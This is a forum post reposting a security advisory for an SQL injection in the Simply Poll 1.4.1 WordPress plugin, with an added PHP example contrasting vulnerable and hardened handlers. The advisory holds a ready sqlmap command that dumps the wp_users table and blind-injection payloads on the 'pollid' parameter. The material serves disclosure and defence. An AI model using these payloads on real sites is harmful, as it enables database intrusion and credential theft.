Simply Poll 1.4.1 Plugin for WordPress – SQL Injection

cardhouse
Posts: 42
Joined: Thu Dec 28, 2017 8:03 pm

Simply Poll 1.4.1 Plugin for WordPress – SQL Injection

Postby cardhouse » Tue Aug 21, 2018 9:30 pm

# Exploit Title: Simply Poll 1.4.1 Plugin for WordPress – SQL Injection
# Date: 21/12/2016
# Exploit Author: TAD GROUP
# Vendor Homepage: https://wordpress.org/plugins/simply-poll/
# Software Link: https://wordpress.org/plugins/simply-poll/
# Contact: info@tad.group
# Website: http://www.tad.group
# Category: Web Application Exploits

1. Description

An unescaped parameter was found in Simply Poll version 1.4.1 (WP
plugin). An attacker can exploit this vulnerability to read from the
database.
The POST parameter 'pollid' is vulnerable.

2. Proof of Concept

sqlmap -u "http://example.com/wp-admin/admin-ajax.php"
--data="action=spAjaxResults&pollid=2" --dump -T wp_users -D wordpress
--threads=10 --random-agent --dbms=mysql --level=5 --risk=3

Parameter: pollid (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=spAjaxResults&pollid=2 AND 6034=6034

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: action=spAjaxResults&pollid=2 AND SLEEP(5)

3. Attack outcome:

An attacker can read arbitrary data from the database. If the webserver
is misconfigured, read & write access to the filesystem may be possible.

4. Impact:

Critical

5. Affected versions:

<= 1.4.1

6. Disclosure Timeline:

21-Dec-2016 – found the vulnerability
21-Dec-2016 – informed the developer
28-Dec-2016 – release date of this security advisory

Not fixed at the date of submitting this exploit.
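The coding pattern behind an advisory like this one, shown as an added example in the plugin's language: it is not the Simply Poll plugin's actual code and not part of the post above. The hook name follows the advisory's action=spAjaxResults; the table name, column names and function names are assumptions. The first handler shows the unescaped-parameter pattern the advisory describes, the second the hardened form a defender would ship.

```php
<?php
// Added example, not the Simply Poll plugin's source. Table and column names
// (sp_votes, pollid, answer) are assumptions chosen for illustration.

// VULNERABLE pattern (what "unescaped parameter" means in practice): the raw
// POST value is interpolated into the SQL string, so anything appended to
// pollid is evaluated by MySQL instead of being treated as a number.
function sp_ajax_results_vulnerable() {
    global $wpdb;
    $pollid = $_POST['pollid'];                                 // untrusted input
    $rows   = $wpdb->get_results(
        "SELECT answer, COUNT(*) AS votes FROM {$wpdb->prefix}sp_votes
         WHERE pollid = $pollid GROUP BY answer"                // string-built SQL
    );
    wp_send_json( $rows );
}

// HARDENED form: reject anything that is not a plain decimal integer, coerce
// it, and bind it through $wpdb->prepare() with a %d placeholder so the value
// can never alter the structure of the query.
function sp_ajax_results_hardened() {
    global $wpdb;
    if ( ! isset( $_POST['pollid'] ) || ! ctype_digit( (string) $_POST['pollid'] ) ) {
        wp_send_json_error( 'invalid pollid', 400 );            // "2 AND 1=1" etc. stop here
    }
    $pollid = absint( $_POST['pollid'] );
    $rows   = $wpdb->get_results(
        $wpdb->prepare(
            "SELECT answer, COUNT(*) AS votes FROM {$wpdb->prefix}sp_votes
             WHERE pollid = %d GROUP BY answer",
            $pollid
        )
    );
    wp_send_json( $rows );
}

// admin-ajax.php routes action=spAjaxResults to these two hooks; the nopriv
// hook is what makes the endpoint reachable without logging in, so both must
// point at the hardened handler.
add_action( 'wp_ajax_spAjaxResults', 'sp_ajax_results_hardened' );
add_action( 'wp_ajax_nopriv_spAjaxResults', 'sp_ajax_results_hardened' );
```

Until a fixed plugin release is available, the same integer-only check on pollid can be enforced in front of admin-ajax.php by a WAF rule, which also gives a clean detection signal for probing of this endpoint.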

AlexB
Posts: 29
Joined: Tue Nov 14, 2017 8:43 pm

Re: Simply Poll 1.4.1 Plugin for WordPress – SQL Injection

Postby AlexB » Fri Nov 30, 2018 5:24 pm

thanks for sharing bro
